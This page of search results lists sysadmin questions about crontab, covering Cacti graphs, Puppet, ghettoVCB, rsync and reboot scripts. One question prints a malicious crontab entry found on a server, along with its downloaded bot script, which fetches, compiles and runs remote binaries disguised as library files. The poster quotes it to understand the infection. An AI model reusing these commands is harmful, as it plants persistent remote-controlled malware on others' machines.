Search Results

Search found 297 results on 12 pages for 'crontab'.

Page 11/12 | < Previous Page | 7 8 9 10 11 12  | Next Page >

  • Blank Cacti Graphs

    - by tortib
    I'm running Ubuntu 14.04 LTS and I'm having an issue with Cacti 0.8.8b not displaying any data in graphs. The graphs are being created and I see files in /var/lib/cacti/rra. My crontab entry for root is the following: */1 * * * * sudo -u www-data php -q /usr/share/cacti/site/poller.php > /dev/null The output of ls -la /var/lib/cacti/rra is the following: # ls -la /var/lib/cacti/rra/ total 1008 drwxrwx--- 2 www-data www-data 4096 Aug 20 19:27 . drwxr-xr-x 3 www-data www-data 4096 Aug 17 01:41 .. -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:23 tortib_com_cpu_nice_34.rrd -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:24 tortib_com_cpu_system_35.rrd -rw-rw-r-- 1 www-data www-data 47992 Aug 20 19:25 tortib_com_cpu_user_36.rrd -rw-r--r-- 1 www-data www-data 94816 Aug 20 19:27 tortib_com_hdd_used_43.rrd -rw-r--r-- 1 www-data www-data 94816 Aug 20 19:23 tortib_com_hdd_used_44.rrd -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:27 tortib_com_load_15min_38.rrd -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:26 tortib_com_load_1min_37.rrd -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:23 tortib_com_load_5min_39.rrd -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:24 tortib_com_mem_buffers_40.rrd -rw-rw-r-- 1 www-data www-data 47992 Aug 20 19:25 tortib_com_mem_cache_41.rrd -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:26 tortib_com_mem_free_42.rrd -rw-r--r-- 1 www-data www-data 94816 Aug 20 19:24 tortib_com_traffic_in_45.rrd -rw-rw-r-- 1 www-data www-data 94816 Aug 20 19:25 tortib_com_traffic_in_46.rrd -rw-r--r-- 1 www-data www-data 94816 Aug 20 19:26 tortib_com_traffic_in_47.rrd -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:27 tortib_com_users_48.rrd I tried to run the poller as root from the command line but it doesn't output anything useful nor does it graph any data. The device in cacti shows that that it's able to query snmp and ping is alive. The graphs are still empty though. snmpwalk 127.0.0.1 -v2c -c public works as it should. It walks all MIBs. I'm quite perplexed as to why this isn't working any longer. It was graphing data but then it just stopped. And when it was graphing data it was graphing it intermittently. Thank you for reading this problem and helping.

    Read the article

  • Is SecureShellz bot a virus? How does it work?

    - by ProGNOMmers
    I'm using a development server in which I found this in the crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd [...] http://stablehost.us/bots/regular.bot contents are: #!/bin/sh if [ $(whoami) = "root" ]; then echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1 wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2 exit 1 fi wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_ I cannot contact the sysadmin for various reasons, so I cannot ask infos about this to him. It seems to me this script downloads some remote C source codes and binaries, compile them and execute them. I am a web developer, so I am not an expert about C language, but watching at the downloaded files it seems to me a bot injected in the cron of the server. Can you give me more infos about what this code does? About its working, its purposes?

    Read the article

  • Ubuntu virtual memory caches suck up memory

    - by Tom
    Hey all, I've got an Ubuntu 9.10 64-bit server that seems to use up all available memory. According to my munin graphs, almost all of the memory used up is in the swap cache, cache, and slab cache. (I take this to mean virtual memory caches, am I right in assuming this?) Once memory usage approaches 100%, some (although not all) system services such as SSH become sluggish and unresponsive. After rebooting the system, performance and memory usage become normal for a time. Some interesting tidbits: The system runs Apache 2, MySQL, Munin, and sshd. The memory usage spikes happen at the same time every night (at 10 PM sharp.) There appears to be nothing in the crontab for any of the users, and nothing in /etc/cron.d/* out of the ordinary, let alone something that would occur at 10 PM. My question is, how do I figure out what is causing the memory suckage? I've tried the usual utilities (e.g. ps, top, etc) but I can't seem to find anything unusual. Any ideas? Thanks in advance!

    Read the article

  • Setting Ubuntu Global PATH for Ruby Enterprise Edition

    - by Wally Glutton
    Context: I recently installed Ruby Enterprise Edition (REE) on an Ubuntu 8.04 server. I would like for this new version of Ruby to globally supersede (for all users, crontabs, etc) the older version in /usr/local/bin. Attempted Solution #1: The REE documentation recommends placing the REE bin folder at the beginning of the global PATH in /etc/environment. I altered the PATH line in this file to read: PATH="/opt/ruby_ee/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games" This did affect my PATH at all. Attempted Solution #2: Next I followed these instructions and updated the PATH setting in the /etc/login.defs and /etc/crontab files. (I did not change /etc/sudoers.) This didn't affect my PATH either, even after logging out and rebooting the server. Other information: I seem to be having the same problem described here. I'm testing using the command: echo $PATH My shell is bash. My .bashrc doesn't not alter my PATH. I'm ssh'ed into the system for all testing. /opt/ruby_ee/ is a sym-link to /opt/ruby-enterprise-1.8.7-2011.03/

    Read the article

  • Puppet Agent fails sporadically, with either timeout or "Could not find class" error

    - by smokris
    I have puppet master running on a Xen dom0, and 3 domUs syncing to it via an hourly crontab puppet agent --test. About 80% of the time, the puppet agent --test completes successfully: info: Retrieving plugin info: Caching catalog for test3 info: Applying configuration version '1333319732' notice: Finished catalog run in 5.08 seconds The other 20% of the time, it fails midway, with errors such as the following: err: Could not retrieve catalog from remote server: Error 400 on SERVER: Could not find class iptables for test1 at /etc/puppet/manifests/site.pp:1 on node test1 warning: Not using cache on failed catalog err: Could not retrieve catalog; skipping run or info: Retrieving plugin info: Caching catalog for test2 info: Applying configuration version '1333319732' notice: Finished catalog run in 24.73 seconds err: Could not send report: Error 500 on SERVER: Internal Server Error private method `gsub' called for WEBrick::HTTPStatus::RequestTimeout:Class WEBrick/1.3.1 (Ruby/1.8.5/2006-08-25) OpenSSL/0.9.8e-rhel5 at puppet:8140 or info: Retrieving plugin err: Could not retrieve catalog from remote server: execution expired warning: Not using cache on failed catalog err: Could not retrieve catalog; skipping run or info: Retrieving plugin info: Caching catalog for test3 info: Applying configuration version '1333319732' notice: Finished catalog run in 9.47 seconds err: Could not send report: Error 408 on SERVER: Request Timeout During this time, I've not made any changes to the Puppet configuration — it just sporadically fails. I'm running puppet-2.7.12 on CentOS, and followed the setup instructions described on http://docs.puppetlabs.com/learning/agent_master_basic.html. Any ideas about how I can troubleshoot this?

    Read the article

  • ghettoVCB issue

    - by romgo75
    I have setup a ghettoVCB script in order to backup three VM. I put it in a crontab but I have an issue. In my backup folder I have 3 different folders, one for each VM. In each folder I have the following files: -rw-r--r-- 1 root root 1263 Mar 17 01:51 vm1-2010-03-16--2.gz -rw-r--r-- 1 root root 1263 Mar 17 00:41 vm1-2010-03-16--3.gz -rw-r--r-- 1 root root 1261 Mar 18 01:22 vm1-2010-03-17--1.gz drwxr-xr-x 1 root root 980 Mar 19 23:39 vm1-2010-03-19 The problem is the last folder. It seems that a backup didn't finish the process. When I read the logs concerning this folder I get: 2010-03-19 23:00:01 -- info: CONFIG - VM_BACKUP_VOLUME = /vmfs/volumes/datastore1/backup/ 2010-03-19 23:00:01 -- info: CONFIG - VM_BACKUP_ROTATION_COUNT = 3 2010-03-19 23:00:01 -- info: CONFIG - DISK_BACKUP_FORMAT = zeroedthick 2010-03-19 23:00:01 -- info: CONFIG - ADAPTER_FORMAT = buslogic 2010-03-19 23:00:01 -- info: CONFIG - POWER_VM_DOWN_BEFORE_BACKUP = 0 2010-03-19 23:00:01 -- info: CONFIG - ENABLE_HARD_POWER_OFF = 0 2010-03-19 23:00:01 -- info: CONFIG - ITER_TO_WAIT_SHUTDOWN = 3 2010-03-19 23:00:01 -- info: CONFIG - POWER_DOWN_TIMEOUT = 5 2010-03-19 23:00:01 -- info: CONFIG - SNAPSHOT_TIMEOUT = 15 2010-03-19 23:00:01 -- info: CONFIG - LOG_LEVEL = info 2010-03-19 23:00:01 -- info: CONFIG - BACKUP_LOG_OUTPUT = stdout 2010-03-19 23:00:01 -- info: CONFIG - VM_SNAPSHOT_MEMORY = 0 2010-03-19 23:00:01 -- info: CONFIG - VM_SNAPSHOT_QUIESCE = 0 2010-03-19 23:00:01 -- info: CONFIG - VMDK_FILES_TO_BACKUP = all http://... 2010-03-19 23:39:35 -- info: Initiate backup for vm1 2010-03-19 23:39:35 -- info: Creating Snapshot "ghettoVCB-snapshot-2010-03-19" for vm1 Destination disk format: VMFS zeroedthick Cloning disk '/vmfs/volumes/datastore1/vm1/vm1_1.vmdk'... ^MClone: 0% done.^MClone: 1% done.^MClone: 2% done.^MClone: 3% done.^MClone: 4% done.^MClone: 5% done.^MClone: 6% done.^MClone: 7% done.^MClone: 8% done.^MClone: 9% done.^MClone Failed to clone disk : The file already exists (39). Destination disk format: VMFS zeroedthick Cloning disk '/vmfs/volumes/datastore1/vm1/vm1.vmdk'... 2010-03-20 00:46:20 -- info: Removing snapshot from vm1 ... one: 7% done.^MClone: 8% done.^MClone: 9% done.^MClone: 10% done.^MClone: 11% done.^MClone: 12% done.^MClone: 13% done.^MClone: 14% done.^MClone: 15% done.^MClone: 16% done.^MCl 2010-03-19 23:51:19 -- info: Removing snapshot from vm1 ... I can't run ghettoVCB anymore because the VM has a snapshot which has not been deleted. I know how to delete the snapshot, but I don't know why the VCB script is not able to handle rotation of the VM backups? Any ideas? Thanks!

    Read the article

  • ghettoVCB issue

    - by romgo75
    Hi, I setup ghettoVCB script in order to backup 3 VM. I put it in a crontab but I have an issue. In my backup folder I have 3 different folder, one for each VM. For each Folder I have th following files : -rw-r--r-- 1 root root 1263 Mar 17 01:51 vm1-2010-03-16--2.gz -rw-r--r-- 1 root root 1263 Mar 17 00:41 vm1-2010-03-16--3.gz -rw-r--r-- 1 root root 1261 Mar 18 01:22 vm1-2010-03-17--1.gz drwxr-xr-x 1 root root 980 Mar 19 23:39 vm1-2010-03-19 The problem is the last folder. It seems that a backup didn't finished the process. When I read the logs concerned by this folder I get : 2010-03-19 23:00:01 -- info: CONFIG - VM_BACKUP_VOLUME = /vmfs/volumes/datastore1/backup/ 2010-03-19 23:00:01 -- info: CONFIG - VM_BACKUP_ROTATION_COUNT = 3 2010-03-19 23:00:01 -- info: CONFIG - DISK_BACKUP_FORMAT = zeroedthick 2010-03-19 23:00:01 -- info: CONFIG - ADAPTER_FORMAT = buslogic 2010-03-19 23:00:01 -- info: CONFIG - POWER_VM_DOWN_BEFORE_BACKUP = 0 2010-03-19 23:00:01 -- info: CONFIG - ENABLE_HARD_POWER_OFF = 0 2010-03-19 23:00:01 -- info: CONFIG - ITER_TO_WAIT_SHUTDOWN = 3 2010-03-19 23:00:01 -- info: CONFIG - POWER_DOWN_TIMEOUT = 5 2010-03-19 23:00:01 -- info: CONFIG - SNAPSHOT_TIMEOUT = 15 2010-03-19 23:00:01 -- info: CONFIG - LOG_LEVEL = info 2010-03-19 23:00:01 -- info: CONFIG - BACKUP_LOG_OUTPUT = stdout 2010-03-19 23:00:01 -- info: CONFIG - VM_SNAPSHOT_MEMORY = 0 2010-03-19 23:00:01 -- info: CONFIG - VM_SNAPSHOT_QUIESCE = 0 2010-03-19 23:00:01 -- info: CONFIG - VMDK_FILES_TO_BACKUP = all http://... 2010-03-19 23:39:35 -- info: Initiate backup for vm1 2010-03-19 23:39:35 -- info: Creating Snapshot "ghettoVCB-snapshot-2010-03-19" for vm1 Destination disk format: VMFS zeroedthick Cloning disk '/vmfs/volumes/datastore1/vm1/vm1_1.vmdk'... ^MClone: 0% done.^MClone: 1% done.^MClone: 2% done.^MClone: 3% done.^MClone: 4% done.^MClone: 5% done.^MClone: 6% done.^MClone: 7% done.^MClone: 8% done.^MClone: 9% done.^MClone Failed to clone disk : The file already exists (39). Destination disk format: VMFS zeroedthick Cloning disk '/vmfs/volumes/datastore1/vm1/vm1.vmdk'... 2010-03-20 00:46:20 -- info: Removing snapshot from vm1 ... one: 7% done.^MClone: 8% done.^MClone: 9% done.^MClone: 10% done.^MClone: 11% done.^MClone: 12% done.^MClone: 13% done.^MClone: 14% done.^MClone: 15% done.^MClone: 16% done.^MCl 2010-03-19 23:51:19 -- info: Removing snapshot from vm1 ... I can't run anymore ghetto VCB because the VM has a snapshot which has not been deleted. I know how to delete the snapshot, but I don't know why the VCB script is not able to handle vm abckup rotate ? Any idea ? Thanks !

    Read the article

  • rsync over ssh backup failing after relocation of server

    - by OlduvaiHand
    I've got two FreeBSD machines set up; one serves video data and the other is the backup for the first. At this point I've got around 4TB of data. I add files to the video server a few at a time, and was planning to use rsync over ssh to keep the backup machine up to date. I did the initial, large backup with both machines hooked up to the same subnet at the lab with no problems using rsync. Then, when I moved the backup machine off-site (but still on the university network), I attempted a sync without changing anything other than the IP (as the machine is now on a different subnet) and got the following error: 2010/03/22 15:55:21 [1260] rsync: connection unexpectedly closed (6340840244 bytes received so far) [receiver] 2010/03/22 15:55:21 [1260] rsync error: error in rsync protocol data stream (code 12) at io.c(601) [receiver=3.0.7] 2010/03/22 15:55:21 [1258] rsync: connection unexpectedly closed (60 bytes received so far) [generator] 2010/03/22 15:55:21 [1258] rsync error: unexplained error (code 255) at io.c(601) [generator=3.0.7] The script that handles the backup hasn't been changed, nor has the crontab that invokes it. Does anyone have any ideas about what might be causing the hiccup? I was under the impression that it might have something to do with the ssh connection timing out or something along those lines, but am not entirely clear on how to diagnose the cause of the problem.

    Read the article

  • How to stop Cron from sending messages about errors

    - by Beck
    I have this strange mails comming from cron: Return-Path: <[email protected]> Delivered-To: [email protected] Received: by domain.com (Postfix, from userid 0) id 6F944264D0; Mon, 10 Jan 2011 10:35:01 +0000 (UTC) From: [email protected] (Cron Daemon) To: [email protected] Subject: Cron <root@domain> lynx -dump http://www.domain.com/cron/realqueue Content-Type: text/plain; charset=ANSI_X3.4-1968 X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin> X-Cron-Env: <HOME=/root> X-Cron-Env: <LOGNAME=root> Message-Id: <[email protected]> Date: Mon, 10 Jan 2011 10:35:01 +0000 (UTC) /bin/sh: lynx: not found I have this cron settings in crontab file: SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin */5 * * * * lynx -dump http://www.domain.com/cron/realqueue 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) Lynx is installed on my Ubuntu as well. Ofc in place of domain.com is my domain, just replaced. Thanks ;)

    Read the article

  • Using AT on Ubuntu to Background Downloads (w/ Queue)

    - by Nicholas Yost
    I am writing a PHP script, but I want to use the AT command in Ubuntu to fetch a remote file via WGET. I'm basically looking to background the process, so PHP can finish fairly quickly. I cannot find any questions on here about how to use both, but I basically want to do the following pseudo-code: <?php exec('at now -q queuename wget http://path.to/remote/file.ext'); ?> Additionally, I'd like to queue this between providers. I'd like to have each path.to have its own queue, so I only download one file from each provider at a time. Meaning: <?php exec('at now -q remote wget http://path.to/remote/file.ext /local/path'); exec('at now -q vendorone wget http://vendor.one/remote/file.ext /local/path'); exec('at now -q vendortwo wget http://vendor.two/remote/file.ext /local/path'); exec('at now -q vendorone wget http://vendor.one/remote/file.ext /local/path'); ?> This should download the files from path.to, vendor.one, vendor.two immediately, and when the first file is finished downloading from vendor.one, it starts the second file. Does that make sense? I can't find anything like this anywhere on the web, much less on SO/SF. If we can use the crontab to run a one-off wget command, thats fine too.

    Read the article

  • Script launching 3 copies of rsync

    - by organicveggie
    I have a simple script that uses rsync to copy a Postgres database to a backup location for use with Point In Time Recovery. The script is run every 2 hours via a cron job for the postgres user. For some strange reason, I can see three copies of rsync running in the process list. Any ideas why this might the case? Here's the cron entry: # crontab -u postgres -l PATH=/bin:/usr/bin:/usr/local/bin 0 */2 * * * /var/lib/pgsql/9.0/pitr_backup.sh And here's the ps list, which shows two copies of rsync running and one sleeping: # ps ax |grep rsync 9102 ? R 2:06 rsync -avW /var/lib/pgsql/9.0/data/ /var/lib/pgsql/9.0/backups/pitr_archives/20110629100001/ --exclude pg_xlog --exclude recovery.conf --exclude recovery.done --exclude pg_log 9103 ? S 0:00 rsync -avW /var/lib/pgsql/9.0/data/ /var/lib/pgsql/9.0/backups/pitr_archives/20110629100001/ --exclude pg_xlog --exclude recovery.conf --exclude recovery.done --exclude pg_log 9104 ? R 2:51 rsync -avW /var/lib/pgsql/9.0/data/ /var/lib/pgsql/9.0/backups/pitr_archives/20110629100001/ --exclude pg_xlog --exclude recovery.conf --exclude recovery.done --exclude pg_log And here's the uber simple script that seems to be the cause of the problem: #!/bin/sh LOG="/var/log/pgsql-pitr-backup.log" base_backup_dir="/var/lib/pgsql/9.0/backups" wal_archive_dir="$base_backup_dir/wal_archives" pitr_archive_dir="$base_backup_dir/pitr_archives" timestamp=`date +%Y%m%d%H%M%S` backup_dir="$pitr_archive_dir/$timestamp" mkdir -p $backup_dir echo `date` >> $LOG /usr/bin/psql -U postgres -c "SELECT pg_start_backup('$backup_dir');" rsync -avW /var/lib/pgsql/9.0/data/ $backup_dir/ --exclude pg_xlog --exclude recovery.conf --exclude recovery.done --exclude pg_log /usr/bin/psql -U postgres -c "SELECT pg_stop_backup();"

    Read the article

  • rsnapshot schedule overlapping, help with backup schedule

    - by Znarkus
    Hello, I have to following configuration. rsnapshot.conf interval halfhourly 4 interval hourly 6 interval twohourly 12 interval daily 7 interval weekly 4 crontab 0,30 * * * * /usr/bin/rsnapshot halfhourly >> /var/log/rsnapshot.halfhourly.log 2>&1 5 * * * * /usr/bin/rsnapshot hourly >> /var/log/rsnapshot.hourly.log 2>&1 10 */2 * * * /usr/bin/rsnapshot twohourly >> /var/log/rsnapshot.twohourly.log 2>&1 15 3 * * * /usr/bin/rsnapshot daily >> /var/log/rsnapshot.daily.log 2>&1 20 6 * * MON /usr/bin/rsnapshot weekly >> /var/log/rsnapshot.weekly.log 2>&1 Only halfhourly is running correctly now. hourly spits out this error: rsnapshot encountered an error! The program was invoked with these options: /usr/bin/rsnapshot hourly ---------------------------------------------------------------------------- ERROR: Lockfile /var/run/rsnapshot.pid exists and so does its process, can not continue To me it seems like my 5 min space between halfhourly and hourly is too small. Is this configuration crazy? I like having backups every thirty minutes, that will probably save my ass some day. Please help me make a decent backup schedule, that doesn't clog up the system, but creates frequent enough backups. Thank you.

    Read the article

  • How do I prevent spawning of zombie-like apache2 processes on Dreamhost VPS?

    - by Jonathan Hayward
    I have had a website for months or longer on a DreamHost VPS, and I have had vague memories on, in initial setup, having to turn off some customized Apache under /dh to get a standard Apache 2.x to work with. Things have been going along on an even keel, when I started making some changes lately and I found that when I tried to bounce Apache (/usr/sbin/apachectl restart), it couldn't bind to port 80, and my site had been converted from a big literature site to a small parking site. I tried to see what was listening on 80, and it was a DreamHost-customized Apache that had spawned. I killed all of them, restarted Apache, and changed the parent directory under /dh to mode 000. That was a day or two ago. I was bouncing Apache again in trying to get a new site to load under HTTPS, and I found that once again DreamHost's apache had spawned, from the directory I set to mode 000, and once again converted my site to a parking page. I renamed the directory, but I am very skeptical of whether I have permanently killed the DreamHost-customized Apache. Besides duct tape options like a crontab to kill and delete each minute, how can I permanently turn off the Apache processes that are spawning from a location under /dh and interfering with standard Apache? What should I be doing that I am not? Can DreamHost's technical support stop the interference? Thanks,

    Read the article

  • On AWS EC2, Unable to run sudo command after modifying permissions to /usr folder

    - by Kayote
    All, We have searched quite a bit and a few of 'Eliah Kagan's' posts are great about getting access back to sudo. However, our server is on AWS EC2 & I am a complete newbie to this. We are trying to setup Cronjobs for backing up our server data. What we did: Using Putty, we created a script file: usr/share/site-db-backup/backupToS3.php, however, Ubuntu was not saving the changes we made as it reported we did not have permission as user 'Ubuntu'. Error details are: "Upload of file backupToS3.php was successful but error occurred while setting the permission &/ or timestamp. If the problem persists, turn on 'ignore permission errors' option. Permission denied. Error code: 3 Request code 9" So, we ran the command "sudo chmod -R a+rwx /usr" for granting permission to the folder 'usr'. However, now whatever sudo command is run, we get the error: "/usr/lib/sudo/sudoers.so must be only be writable by owner. fatal error, unable to load plugins." We are complete newbies to Ubuntu & EC2 so do need step by step guidance of how to get sudo back & successfully write to the Crontab script sitting in 'usr/' folder.

    Read the article

  • Server Crash Diagnosis...Are there any 'black box recorder' style programs available.

    - by columbo
    My redhat server is crashing every three weeks or so at 4:15am ish on Sunday mornings. (well it was sundays the last two have been Thursday mornings at 4:15ish) Looking at the logs (mysql, httpd, messages) there are no clues as to why. They just seem to stop. I ran a little script to take memory readings every 15 minutes and it too stops (with normal readings) at this time. The server is remote at a provider so I can only access it via the web. I use Plesk. It appears to be a set job or something that is causing the issue. I can see nothing in crontab. So my question is...has anyone else had this and can offer advice? Failing that. Does any one know of a way to get more detailed logging than that offered by the messages file? I was thinking of a black box style recording program or maybe something as simple as an option somewhere to increase the level of reporting in the messages log. Thanks

    Read the article

  • Changing PATH Environment Variable for all Users. (Ubuntu)

    - by Wally Glutton
    I recently compiled Ruby Enterprise Edition (REE) on an Ubuntu 8.04 server. I would like to update my PATH to ensure this new version of Ruby (found in /opt/ruby_ee/bin) supersedes the older version in /usr/local/bin. (I still want the old version around, though.) I would like these PATH changes to affect all users and crontabs. Attempted Solution #1: The REE documentation recommends placing the REE bin folder at the beginning of the global PATH in /etc/environment. I altered the PATH in this file to read: PATH="/opt/ruby_ee/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games" This did not affect my PATH at all. Attempted Solution #2: Next I followed these instructions and updated the PATH setting in /etc/login.defs and /etc/crontab. (I did not change /etc/sudoers.) This didn't affect my PATH either, even after logging out and rebooting the server. Other information: I seem to be having the same problem described here. I'm testing using the commands "echo $PATH" and "ruby -v". My shell is bash. My .bashrc doesn't override my PATH. Yes, I have heard of the Ruby Version Manager project. ;)

    Read the article

  • Debian Server wont reboot from script

    - by Littlejon
    I have a script that is run to backup a server via Rsync, after that script is run I want the server to reboot. My script is run as root from the Crontab at 3am in the morning. #!/bin/bash HOST="email" RSYNC_OPTS="-a -v -v --progress --stats --delete" RSYNC_DEST="10.0.0.10::$HOST" BACKUP_LIST="/etc /home /root" TIMESTAMP="/timestamp-bkup-start.chk" TIMESTAMP2="/timestamp-bkup-stop.chk" touch $TIMESTAMP rsync $RSYNC_OPTS $TIMESTAMP $RSYNC_DEST for BACKUP_ITEM in $BACKUP_LIST; do rsync $RSYNC_OPTS $BACKUP_ITEM $RSYNC_DEST done /etc/init.d/zimbra stop sleep 60s rsync $RSYNC_OPTS /opt $RSYNC_DEST touch $TIMESTAMP2 rsync $RSYNC_OPTS $TIMESTAMP2 $RSYNC_DEST echo `date +%Y%m%d%H%M` >> /var/log/reset reboot # $# shows number of args passed # $1 to access first variable #if [ $# -eq 1 ]; then # if [ $1 = "withreboot" ]; then # echo "rebooting..."; # echo `date +%Y%m%d%H%M` >> /var/log/reset # /sbin/reboot # fi #fi I have tried using init 6 rather then reboot. I have tried /sbin/reboot. I also have another basic script that just echos to the reset log and runs reboot without issue. It is just with the script above the server wont restart. If anyone has any theories that would be great as I have run out of idea. Thanks, Jon

    Read the article

  • Run GUI application via cronjob in Ubuntu?

    - by Christoffer
    Hi, I have a remote server running "Ubuntu 10.04 Desktop". From it I want to run a script that walks through a list of websites and captures screenshots of them. The script is working and thoroughly tested. When I SSH to the server with ssh -X user@ip-adress I can run my script by calling ./myscript.py and everything will work OK. I then modifed my crontab file and added... 59 17 * * * env DISPLAY=:0 /path/to/myscript.py ...as recommended by the Ubuntu WIKI. I can see in the /var/log/syslog that my cron job is started, but it doesn't capture any screenshots. When running env DISPLAY=:0 /path/to/myscript.py from the shell I get No protocol specified myscript.py: cannot connect to X server :0 If I ssh to the server without the -X option I only get the second row of the error: myscript.py: cannot connect to X server :0 What can I try now? More details I have run xhost +local: and checked the output of xhost to see that the option was set correctly. If I run ls /tmp/.X11-unix/ the output is X0 The server only has one screen. Thank you in advance!

    Read the article

  • Ubuntu 8.04 wont reboot from script

    - by Littlejon
    I have a script that is run to backup a server via Rsync, after that script is run I want the server to reboot. My script is run as root from the Crontab at 3am in the morning. #!/bin/bash HOST="email" RSYNC_OPTS="-a -v -v --progress --stats --delete" RSYNC_DEST="10.0.0.10::$HOST" BACKUP_LIST="/etc /home /root" TIMESTAMP="/timestamp-bkup-start.chk" TIMESTAMP2="/timestamp-bkup-stop.chk" touch $TIMESTAMP rsync $RSYNC_OPTS $TIMESTAMP $RSYNC_DEST for BACKUP_ITEM in $BACKUP_LIST; do rsync $RSYNC_OPTS $BACKUP_ITEM $RSYNC_DEST done /etc/init.d/zimbra stop sleep 60s rsync $RSYNC_OPTS /opt $RSYNC_DEST touch $TIMESTAMP2 rsync $RSYNC_OPTS $TIMESTAMP2 $RSYNC_DEST echo `date +%Y%m%d%H%M` >> /var/log/reset reboot # $# shows number of args passed # $1 to access first variable #if [ $# -eq 1 ]; then # if [ $1 = "withreboot" ]; then # echo "rebooting..."; # echo `date +%Y%m%d%H%M` >> /var/log/reset # /sbin/reboot # fi #fi I have tried using init 6 rather then reboot. I have tried /sbin/reboot. I also have another basic script that just echos to the reset log and runs reboot without issue. It is just with the script above the server wont restart. If anyone has any theories that would be great as I have run out of idea. Thanks, Jon

    Read the article

  • Why is cron mailing me program output even though I've redirected to /dev/null?

    - by Server Fault
    I'm trying to restart a system process through cron and getting emailed the startup output of the process. I thought redirecting STDOUT and SDTERR to /dev/null would "silence" the output but alas, this has not work. How can I get cron to silently restart this service? crontab entry: 0 6 * * * service sympa stop &>/dev/null; service sympa start &> /dev/null sample output from restart email: Stopping Sympa bounce manager bounced ...done. * Stopping Sympa task manager task_manager ...done. * Stopping Sympa mailing list archive manager archived ...done. * Stopping Sympa mailing list manager sympa ...done. ... waiting Prototype mismatch: sub Lock::LOCK_SH () vs none at /home/sympa/bin/Lock.pm line 38. Constant subroutine LOCK_SH redefined at /home/sympa/bin/Lock.pm line 38. Prototype mismatch: sub Lock::LOCK_EX () vs none at /home/sympa/bin/Lock.pm line 39. Constant subroutine LOCK_EX redefined at /home/sympa/bin/Lock.pm line 39. Prototype mismatch: sub Lock::LOCK_NB () vs none at /home/sympa/bin/Lock.pm line 40. Constant subroutine LOCK_NB redefined at /home/sympa/bin/Lock.pm line 40.

    Read the article

  • postfix revived and delivered have the same values (?)

    - by thinkingbig
    I have configured my first server (Debian with ISPConfig). Generally i want to send bulk e-mails to our users, i configure postfix and turn on postfix... but... After 1 hour of sending emails i have logs like this: Grand Totals messages 21886 received 21883 delivered 0 forwarded 0 deferred 234 bounced 0 rejected (0%) 0 reject warnings 0 held 0 discarded (0%) 30805k bytes received 31280k bytes delivered 3 senders 3 sending hosts/domains 12588 recipients 3 recipient hosts/domains Per-Hour Traffic Summary time received delivered deferred bounced rejected -------------------------------------------------------------------- 0000-0100 0 0 0 0 0 0100-0200 0 0 0 0 0 0200-0300 0 0 0 0 0 0300-0400 0 0 0 0 0 0400-0500 0 0 0 0 0 0500-0600 0 0 0 0 0 0600-0700 0 0 0 0 0 0700-0800 0 0 0 0 0 0800-0900 0 0 0 0 0 0900-1000 0 0 0 0 0 1000-1100 0 0 0 0 0 1100-1200 0 0 0 0 0 1200-1300 0 0 0 0 0 1300-1400 0 0 0 0 0 1400-1500 0 0 0 0 0 1500-1600 15311 15306 0 168 0 1600-1700 6575 6577 0 66 0 1700-1800 0 0 0 0 0 1800-1900 0 0 0 0 0 1900-2000 0 0 0 0 0 2000-2100 0 0 0 0 0 2100-2200 0 0 0 0 0 2200-2300 0 0 0 0 0 2300-2400 0 0 0 0 0 Host/Domain Summary: Message Delivery sent cnt bytes defers avg dly max dly host/domain 21521 30353k 0 3.4 m 15.5 m wp.pl 355 919k 0 54.9 s 13.0 m mysenderdomainexample.pl 7 8477 0 1.7 s 1.9 s prokonto.pl Host/Domain Summary: Messages Received msg cnt bytes host/domain 21879 30786k mysenderdomainexample.pl 5 16196 mx4.wp.pl 1 3200 mx3.wp.pl Senders by message count 21783 [email protected] 96 [email protected] 6 from=< **So, my question is: 1) Why i have recived and delivered have the same values (approx)? 2) How can I check if an email has been delivered? 3) How to change default "root" and "www-data" user (FROM / RETURN PATH) to another? I have changed this in script, but postfix ignore scripting values and send every mail from root (we have .php send cron's in /etc/crontab) 4) WHY APPROX 100 % MAILS RECIVED HAS BEEN ADRESED TO MY SENDER HOST? Host/Domain Summary: Messages Received Waiting for respond, Regards TB**

    Read the article

  • I have a perl script that is supposed to run indefinitely. It's being killed... how do I determine who or what kills it?

    - by John O
